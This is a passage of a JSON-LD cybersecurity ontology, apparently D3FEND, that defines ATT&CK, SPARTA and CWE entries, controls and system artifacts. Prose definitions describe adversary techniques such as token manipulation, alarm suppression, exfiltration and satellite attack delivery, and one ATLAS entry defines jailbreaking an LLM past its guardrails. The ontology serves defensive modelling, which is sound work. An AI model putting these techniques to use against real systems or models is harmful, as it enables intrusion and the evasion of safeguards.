      "rdfs:label": "Unix Shell Configuration Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N0b82f1f21b2943d1a6fcfd8b624a6509"
        }
      ]
    },
    {
      "@id": "_:N0b82f1f21b2943d1a6fcfd8b624a6509",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitConfigurationFile"
      }
    },
    {
      "@id": "d3f:T1037.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.003",
      "d3f:definition": "Group Policy Object / Active Directory Users and Computers are both Active Directory-based.",
      "d3f:modifies": {
        "@id": "d3f:NetworkInitScriptFileResource"
      },
      "rdfs:label": "Network Logon Script",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N437ba71df0dd4aeb9fd7ea7bd5837491"
        }
      ]
    },
    {
      "@id": "_:N437ba71df0dd4aeb9fd7ea7bd5837491",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkInitScriptFileResource"
      }
    },
    {
      "@id": "d3f:CWE-362",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-362",
      "d3f:definition": "The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.",
      "d3f:synonym": "Race Condition",
      "d3f:weakness-of": {
        "@id": "d3f:SharedResourceAccessFunction"
      },
      "rdfs:label": "Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-691"
        },
        {
          "@id": "_:Nfab449ffec454514bcdd299690f6bd93"
        }
      ]
    },
    {
      "@id": "_:Nfab449ffec454514bcdd299690f6bd93",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedResourceAccessFunction"
      }
    },
    {
      "@id": "d3f:CCI-000205_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces minimum password length.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000205"
    },
    {
      "@id": "d3f:TransportLink",
      "@type": "owl:Class",
      "d3f:definition": "A Transport Link is a type of logical link that exists at the transport layer of a network or system architecture.",
      "rdfs:label": "Transport Link",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_17",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Domain Authentication",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "rdfs:label": "AC-4(17)"
    },
    {
      "@id": "d3f:T0840",
      "@type": "owl:Class",
      "d3f:attack-id": "T0840",
      "d3f:definition": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network  (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.",
      "rdfs:label": "Network Connection Enumeration - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Connection Enumeration"
    },
    {
      "@id": "d3f:IntrusionPreventionSystem",
      "@type": "owl:Class",
      "d3f:definition": "Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, report it and attempt to block or stop it.\n\nIntrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent or block intrusions that are detected. IPS can take such actions as sending an alarm, dropping detected malicious packets, resetting a connection or blocking traffic from the offending IP address. An IPS also can correct cyclic redundancy check (CRC) errors, defragment packet streams, mitigate TCP sequencing issues, and clean up unwanted transport and network layer options.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Intrusion_detection_system#Intrusion_prevention"
      },
      "rdfs:label": "Intrusion Prevention System",
      "rdfs:seeAlso": {
        "@id": "dbr:Intrusion_detection_system"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IntrusionDetectionSystem"
      },
      "skos:altLabel": [
        "IDPS",
        "IPS",
        "Intrusion Detection and Prevention System"
      ]
    },
    {
      "@id": "d3f:CWE-211",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-211",
      "d3f:definition": "The product performs an operation that triggers an external diagnostic or error message that is not directly generated or controlled by the product, such as an error generated by the programming language interpreter that a software application uses. The error can contain sensitive system information.",
      "rdfs:label": "Externally-Generated Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-209"
      }
    },
    {
      "@id": "d3f:RD-0004.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0004.01",
      "d3f:definition": "Adversaries select the pathway that best balances effect, risk, bandwidth, and attribution. Options include over-the-air telecommand injection on TT&C links, manipulation of payload downlinks or user terminals, abuse of crosslinks or gateways, pivoting through commercial ground networks, or pushing malicious updates via supply-chain paths (software, firmware, bitstreams). Selection considers modulation/coding, Doppler and polarization, anti-replay windows, pass geometry, rate/size limits, and expected operator workload (handover, LEOP, safing exits). For ground/cloud paths, actors account for identity boundaries, automation hooks, and change-control cadence. The “delivery mechanism” is end-to-end: RF front-end (antenna, converters, HPAs), baseband/SDR chain, protocol/framing, authentication/counter handling, scheduling, and fallbacks if detection occurs. Rehearsal artifacts, test vectors, mock dictionaries, ephemerides, are built alongside.",
      "rdfs:label": "Identify/Select Delivery Mechanism - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0004/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0004"
      },
      "skos:prefLabel": "Identify/Select Delivery Mechanism"
    },
    {
      "@id": "d3f:OffensiveTechnique",
      "@type": "owl:Class",
      "d3f:display-baseurl": "/offensive-technique/attack/",
      "rdfs:isDefinedBy": {
        "@id": "https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf"
      },
      "rdfs:label": "Offensive Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberTechnique"
        },
        {
          "@id": "_:N8fd6a018a0df4268b695e522835e4887"
        },
        {
          "@id": "_:Nce60f6d66bb04b3ea47f93697f7fc72a"
        }
      ]
    },
    {
      "@id": "_:N8fd6a018a0df4268b695e522835e4887",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OffensiveTactic"
      }
    },
    {
      "@id": "_:Nce60f6d66bb04b3ea47f93697f7fc72a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:initiates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Access"
      }
    },
    {
      "@id": "d3f:CWE-1112",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1112",
      "d3f:definition": "The document does not fully define all mechanisms that are used to control or influence how product-specific programs are executed.",
      "rdfs:label": "Incomplete Documentation of Program Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:Reference-PreventingExecutionOfTaskScheduledMalware_McAfeeLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160105450A1"
      },
      "d3f:kb-abstract": "A method for preventing malware attacks includes the steps of detecting an attempt on an electronic device to access a task scheduler, determining an entity associated with the attempt to access the task scheduler, determining a malware status of the entity, and, based on the malware status of the entity, allowing or denying the attempted access to the task scheduler. The task scheduler is configured to launch one or more applications at a specified time or interval.",
      "d3f:kb-author": "Anil Ramabhatta, Harinath Vishwanath Ramachetty, Nandi Dharma Kishore",
      "d3f:kb-mitre-analysis": "Access to a job scheduler is intercepted using hooking or file filters to identify and analyze the source files, processes, destination files, or destination servers associated with a scheduled job. The identified servers or files associated with a job are compared against an anti-malware signature database or reputation server to determine if it there is a match. If so, execution is denied and an alert is generated.",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ScheduledJobAnalysis"
      },
      "d3f:kb-reference-title": "Preventing execution of task scheduled malware",
      "rdfs:label": "Reference - Preventing execution of task scheduled malware - McAfee LLC"
    },
    {
      "@id": "d3f:LinuxExecveat",
      "@type": "owl:Class",
      "d3f:definition": "Execute program relative to a directory file descriptor. Behavior is similar to Linux Execve.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/execveat.2.html"
      },
      "rdfs:label": "Linux Execveat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIExec"
      }
    },
    {
      "@id": "d3f:CWE-1021",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1021",
      "d3f:definition": "The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.",
      "d3f:synonym": [
        "Clickjacking",
        "Tapjacking",
        "UI Redress Attack"
      ],
      "rdfs:label": "Improper Restriction of Rendered UI Layers or Frames",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-441"
        },
        {
          "@id": "d3f:CWE-451"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0054",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0054",
      "d3f:definition": "An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to place LLM in a state in which it will freely respond to any user input, bypassing any controls, restrictions, or guardrails placed on the LLM.\nOnce successfully jailbroken, the LLM can be used in unintended ways by the adversary.",
      "rdfs:label": "LLM Jailbreak - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0054"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATLASPrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "LLM Jailbreak"
    },
    {
      "@id": "d3f:T1547.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547.013",
      "d3f:definition": "Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)",
      "rdfs:label": "XDG Autostart Entries",
      "rdfs:subClassOf": {
        "@id": "d3f:T1547"
      }
    },
    {
      "@id": "d3f:AccessControlConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information about what access permissions are granted to particular users for particular objects.",
      "rdfs:label": "Access Control Configuration",
      "rdfs:seeAlso": {
        "@id": "dbr:Access-control_list"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:HardwareTimerInterruptEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a hardware timer generates an interrupt signal upon expiration or interval completion.",
      "rdfs:label": "Hardware Timer Interrupt Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareTimerEvent"
      }
    },
    {
      "@id": "d3f:RemoteDatabaseQuery",
      "@type": "owl:Class",
      "d3f:definition": "A remote query session enabling a user to make an SQL, SPARQL, or similar query over the network from one host to another.",
      "rdfs:label": "Remote Database Query",
      "rdfs:seeAlso": {
        "@id": "https://www.sciencedirect.com/topics/computer-science/remote-database-server"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseQuery"
        },
        {
          "@id": "d3f:RemoteCommand"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ReferenceNullification_SecureSoftwareInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cwe.mitre.org/documents/sources/TheCLASPApplicationSecurityProcess.pdf"
      },
      "d3f:kb-organization": "Secure Software, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ReferenceNullification"
      },
      "d3f:kb-reference-title": "The CLASP Application Security Process",
      "rdfs:label": "Reference - Reference Nullification"
    },
    {
      "@id": "d3f:CWE-369",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-369",
      "d3f:definition": "The product divides a value by zero.",
      "rdfs:label": "Divide By Zero",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:CWE-1316",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1316",
      "d3f:definition": "The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region.",
      "rdfs:label": "Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:OperatingSystemExecutableFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system executable is a critical executable that is part of the operating system, and without which, the operating system may not operate correctly.",
      "rdfs:label": "Operating System Executable File",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:NaiveBayesClassifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NBC",
      "d3f:definition": "The Naïve Bayes classifier is a supervised machine learning algorithm, which is used for classification tasks, like text classification. It is also part of a family of generative learning algorithms, meaning that it seeks to model the distribution of inputs of a given class or category.",
      "d3f:kb-article": "## References\nNaive Bayes. IBM. [Link](https://www.ibm.com/topics/naive-bayes?mhsrc=ibmsearch_a&mhq=naive%20bayes).",
      "rdfs:label": "Naive Bayes Classifier",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:WindowsOpenProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens an existing local process object.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtOpenProcess"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess"
      },
      "rdfs:label": "Windows OpenProcess",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPITraceProcess"
        },
        {
          "@id": "_:Nf6248e6a01ee4c89b5eb5909c6c145e4"
        }
      ]
    },
    {
      "@id": "_:Nf6248e6a01ee4c89b5eb5909c6c145e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtOpenProcess"
      }
    },
    {
      "@id": "d3f:WebServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A web server is server software, or hardware dedicated to running this software, that can satisfy client requests on the World Wide Web. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. While the major function is to serve content, a full implementation of HTTP also includes ways of receiving content from clients. This feature is used for submitting web forms, including uploading of files.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_server"
      },
      "rdfs:label": "Web Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:M1046",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:BootloaderAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "rdfs:label": "Boot Integrity"
    },
    {
      "@id": "d3f:T1069.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069.002",
      "d3f:definition": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.",
      "rdfs:label": "Domain Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1069"
      }
    },
    {
      "@id": "d3f:CCI-002466_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system requests data integrity verification on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002466"
    },
    {
      "@id": "d3f:LinuxSocketcallArgumentSYS_CONNECT",
      "@type": "owl:Class",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/socketcall.2.html"
      },
      "rdfs:label": "Linux Socketcall Argument SYS_CONNECT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIConnectSocket"
      }
    },
    {
      "@id": "d3f:Kernel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:KernelProcessTable"
      },
      "d3f:definition": "The kernel is a computer program that constitutes the central core of a computer's operating system. It has complete control over everything that occurs in the system. As such, it is the first program loaded on startup, and then manages the remainder of the startup, as well as input/output requests from software, translating them into data processing instructions for the central processing unit. It is also responsible for managing memory, and for managing and communicating with computing peripherals, like printers, speakers, etc. The kernel is a fundamental part of a modern computer's operating system.",
      "d3f:loads": {
        "@id": "d3f:Application"
      },
      "d3f:manages": [
        {
          "@id": "d3f:OperatingSystemProcess"
        },
        {
          "@id": "d3f:UserProcess"
        }
      ],
      "d3f:may-contain": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "d3f:KernelModule"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:Kernel_(operating_system)"
      },
      "rdfs:label": "Kernel",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/kernel"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemSoftware"
        },
        {
          "@id": "_:N54f636456ce2464aaaf9c17c2de39211"
        },
        {
          "@id": "_:Naacd96f7906b4be6bf19db8e4f3a7c69"
        },
        {
          "@id": "_:N047f9440b04a486c85e23180f834acfc"
        },
        {
          "@id": "_:Nc320c87bdc59487d8d9b4e2bd11533a2"
        },
        {
          "@id": "_:N98f10988d9fc48eb8bcb2be2c2e1f190"
        },
        {
          "@id": "_:N3538f88549ec4604ad8cef32434abdb3"
        }
      ]
    },
    {
      "@id": "_:N54f636456ce2464aaaf9c17c2de39211",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelProcessTable"
      }
    },
    {
      "@id": "_:Naacd96f7906b4be6bf19db8e4f3a7c69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "_:N047f9440b04a486c85e23180f834acfc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemProcess"
      }
    },
    {
      "@id": "_:Nc320c87bdc59487d8d9b4e2bd11533a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserProcess"
      }
    },
    {
      "@id": "_:N98f10988d9fc48eb8bcb2be2c2e1f190",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:N3538f88549ec4604ad8cef32434abdb3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:T1639",
      "@type": "owl:Class",
      "d3f:attack-id": "T1639",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "rdfs:label": "Exfiltration Over Alternative Protocol - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration Over Alternative Protocol"
    },
    {
      "@id": "d3f:CWE-1007",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1007",
      "d3f:definition": "The product displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action.",
      "d3f:synonym": "Homograph Attack",
      "rdfs:label": "Insufficient Visual Distinction of Homoglyphs Presented to User",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-451"
      }
    },
    {
      "@id": "d3f:mediates-access-to",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x mediates-access-to y: The entity x controls and brokers requests to reach entity y, enforcing the access rules that allow or deny it.",
      "rdfs:label": "mediates-access-to",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:may-counter-attack",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-counter-attack",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-tactically-associated-with"
      }
    },
    {
      "@id": "d3f:AddressSpace",
      "@type": "owl:Class",
      "d3f:definition": "An address space defines a range of discrete addresses, each of which may correspond to a network host, peripheral device, disk sector, a memory cell or other logical or physical entity. For software programs to save and retrieve stored data, each unit of data must have an address where it can be located. The number of address spaces available depends on the underlying address structure, which is usually limited by the computer architecture being used.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Address_space"
      },
      "rdfs:label": "Address Space",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:MemoryBlockStartValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-MBSV",
      "d3f:definition": "Ensuring that a pointer accurately references the beginning of a designated memory block.",
      "d3f:hardens": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "d3f:kb-article": "## How it Works\nEnsure that a pointer is referencing the beginning of the intended block before using.\n\n## Considerations\nBe careful with pointer arithmetic.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CManualPointerArithmetic_GNU"
      },
      "rdfs:label": "Memory Block Start Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PointerValidation"
        },
        {
          "@id": "_:Nabaabf5f201b40bf97347ac12074947b"
        }
      ]
    },
    {
      "@id": "_:Nabaabf5f201b40bf97347ac12074947b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:T0838",
      "@type": "owl:Class",
      "d3f:attack-id": "T0838",
      "d3f:definition": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes.",
      "rdfs:label": "Modify Alarm Settings - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Modify Alarm Settings"
    },
    {
      "@id": "d3f:CommandHistoryLogFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:CommandHistoryLog"
      },
      "d3f:definition": "A command history log file is a file containing a command history, which the history of commands run in an operating system shell.",
      "rdfs:label": "Command History Log File",
      "rdfs:seeAlso": {
        "@id": "dbr:Command_history"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LogFile"
        },
        {
          "@id": "_:Nf6b85c43440341f784e3259ebf527d85"
        }
      ]
    },
    {
      "@id": "_:Nf6b85c43440341f784e3259ebf527d85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:DS0018",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules",
      "d3f:exactly": {
        "@id": "d3f:Firewall"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Firewall Metadata component",
      "rdfs:label": "Firewall (ATT&CK DS)"
    },
    {
      "@id": "d3f:EXF-0003.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0003.02",
      "d3f:definition": "The attacker records spacecraft-to-ground traffic, real-time telemetry, recorder playbacks, payload products, and mirrored command sessions, to obtain mission data and health/state information. With sufficient signal quality and protocol knowledge, frames and packets are demodulated and extracted for offline use; where protection exists only on uplink or is inconsistently applied, downlink content may still be in clear. Downlinked command echoes, event logs, and file catalogs can expose internal activities and aid follow-on targeting while the primary objective remains data capture at scale.",
      "rdfs:label": "Downlink Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0003/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0003"
      },
      "skos:prefLabel": "Downlink Exfiltration"
    },
    {
      "@id": "d3f:CWE-224",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-224",
      "d3f:definition": "The product records security-relevant information according to an alternate name of the affected entity, instead of the canonical name.",
      "rdfs:label": "Obscured Security-relevant Information by Alternate Name",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:Reference-Anti-tamperSystemWithSelf-adjustingGuards_ARXANTECHNOLOGIESInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150052603A1"
      },
      "d3f:kb-abstract": "An anti-tamper system is disclosed that includes self-adjusting guards inserted in software. Self-adjusting guards include invocation criteria and guard function. During run-time, each time the self-adjusting guard is invoked, the invocation criteria is evaluated and the guard function is only executed if the invocation criteria is satisfied. The invocation criteria can be static or dynamic, satisfied randomly with fixed or varying probability, a monotonically or exponentially decreasing function or most any other type of function. The invocation criteria can be satisfied based on elapsed inter-guard invocation time (time since last guard function execution), target inter-guard invocation time, and/or guard execution time. A method is disclosed of inserting self-adjusting guards into software, and executing the software. Evaluating the invocation criteria can include adjusting the invocation criteria when satisfied. The self-adjusting guards can be inserted into the software at a source or object code level.",
      "d3f:kb-author": "Kevin Dale Morgan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "ARXAN TECHNOLOGIES Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Anti-tamper system with self-adjusting guards",
      "rdfs:label": "Reference - Anti-tamper system with self-adjusting guards - ARXAN TECHNOLOGIES Inc"
    },
    {
      "@id": "d3f:ApplicationScanTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A variable that tracks the measured time it takes to begin, run, and complete a select portion of an application's logic.",
      "rdfs:label": "Application Scan Time",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationRuntimeVariable"
      }
    },
    {
      "@id": "d3f:T1134",
      "@type": "owl:Class",
      "d3f:attack-id": "T1134",
      "d3f:definition": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.",
      "rdfs:label": "Access Token Manipulation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-567",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-567",
      "d3f:definition": "The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes.",
      "rdfs:label": "Unsynchronized Access to Shared Data in a Multithreaded Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-820"
      }
    },
    {
      "@id": "d3f:ProbabilisticLogic",
      "@type": [
        "owl:Class",
